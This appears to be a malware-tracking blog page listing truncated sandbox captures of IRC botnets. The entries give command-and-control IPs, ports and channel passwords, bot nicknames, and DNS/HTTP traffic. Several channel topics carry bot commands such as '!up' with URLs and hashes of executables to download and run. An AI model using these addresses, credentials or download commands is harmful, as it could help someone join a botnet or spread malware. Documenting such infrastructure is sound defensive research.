Author: Pig

The noob behind this net is a very big hf hecker named Mystical Remote Host Port Number 199.15.234.7 80 80.82.66.220 6667 Local users: Current Local Users: 1199 Max: 2019 Global users: Current Global Users: 1199 Max: 2019 PONG :B070CCDD JOIN #Techno PONG :Unreal.ircd NICK n{US|XP-32a}ffmidty USER ffmidty 0 * :ffmidty Other channels: #gBot 8 [+sntu]Read more...

This malware injects to notepad.exe notepad.exe – Network Activity – DNS Queries: dl.dropbox.com DNS_TYPE_A 50.16.240.166 107.20.132.92 107.20.134.231 107.20.135.122 107.20.207.68 174.129.232.94 184.73.245.80 23.21.195.136 www.comeciosilvaa.com.br DNS_TYPE_A 200.98.197.80 YES udp www.pandafix.com.br DNS_TYPE_A 187.17.98.44 YES udp – HTTP Conversations: 50.16.240.166:80 – [dl.dropbox.com] Request: GET /u/56787160/index.html Response: 200 “OK” 200.98.197.80:80 – [www.comeciosilvaa.com.br] Request: POST /avisosgordim/index.php Response: 404 “Not Found” 187.17.98.44:80Read more...

Remote Host Port Number 199.15.234.7 80 200.121.52.63 80 199.19.105.67 1085 PASS mypass NICK n{US|XPa}wwphlrx USER wwphlrx 0 0 :wwphlrx JOIN #boss secret PRIVMSG #boss :[DNS]: Blocked 0 domain(s) – Redirected 6 domain(s) [#boss] [ Topic: !up http://www.bairesac.com/exploradore.exe 190416f04cfb5877642f69b8f59708dd ] hosting infos: http://whois.domaintools.com/199.19.105.67

Remote Host Port Number 199.15.234.7 80 46.166.140.140 6667 PASS secret Clients: I have 111 clients and 0 servers Local users: Current Local Users: 111 Max: 205 Global users: Current Global Users: 111 Max: 205 NICK n{US|XPa}mthtknh USER mthtknh 0 0 :mthtknh JOIN #bone peruch Now talking in #bone Joins: {ESP|XPa}tyxdvpo [tyxdvpo@594ABF0E.765DC855.6CB32CB6.IP] Joins: {PE|W7u}ldbnzwu 12[15ldbnzwu@22B3CEAE.9F16B729.F84BD3C2.IP] hostingRead more...

Remote Host Port Number 108.163.164.154 1863 MODE {XPUSA706826} -ix PRIVMSG #per1 : 14,1. 15:: 11iMBot 9[Actualizacion] Iniciando descarga: 63.5KB a: C:DOCUME~1UserNameLOCALS~1Temperaseme_02130.exe @ 31.8KB/sec. QUIT 3,1 Actualizando al nuevo binario NICK {XPUSA48968} USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA48968} -ix JOIN #per JOIN #per1 hosting infos: http://whois.domaintools.com/108.163.164.154

Domains used for the botnet: chicken1000.mooo.com 127.0.0.2 not active yet api.wipmania.com 199.15.234.7 fasterthanhim.com 91.226.78.31 active sad-stone.com NONE not active yet sad-stone.com.local NONE not active yet C&C Server: 91.226.78.31:8765 Server Password: Username: dxvzrjf Nickname: n{DE|XPa}dxvzrjf Channel: #GODS (Password: secret) Channeltopic: :~up http://www.emprender.edu.co/media/system/js/war.exe 24e3da41454dcbe517037d306c644245 ~mdns http://www.farmaciavirtual.com.co/pruebas/z.txt sample here and here hosting infos: http://whois.domaintools.com/91.226.78.31

Remote Host Port Number 37.59.74.224 6665 PASS google_cache2.tmp NICK new[fbe-XP-USA]286504 USER 0348 “” “TsGh” :0348 PONG :901E418A JOIN #G u12344u Now talking in #G Topic On: [ #G ] [ ] Topic By: [ inm ] Joins: [fbe-XP-YEM]541433 [5414@0wn3d-F3F21148.dynamic.yemennet.ye] Joins: [fbe-XP-SAU]731906 [4962@84EEFA9B.2199BF6.97E20028.IP] Joins: [fbe-XP-SAU]000244 [0002@37AB46F7.7A8C2D64.C25393E1.IP] Joins: [fbe-XP-SAU]737710 [7377@C250848.3BBB233E.5822195F.IP] Joins: [fbe-XP-SAU]372114 [3721@DFD745AA.8F1AA4B1.A97334FE.IP] Joins: [fbe-W7-USA]180197 [0792@4A76F5E6.CCDF15C9.3AA76D10.IP] hostingRead more...

Remote Host Port Number 213.239.195.4 2345 MODE New[USA|00|P|46215] -ix PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. JOIN #!loco! PONG 22 MOTD Channel Topic for Channel #!loco!: “.m.s|.m.e ehaha foto http://goo.gl/ymh4i?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]:Read more...

Remote Host Port Number 211.138.126.142 6532 PASS fuck3d MODE #hp# -ix PONG irc.nkworld.com NICK [00|USA|667594] USER XP-3819 * 0 :COMPUTERNAME MODE [00|USA|667594] -ix JOIN #hp# fux hosting infos: http://whois.domaintools.com/211.138.126.142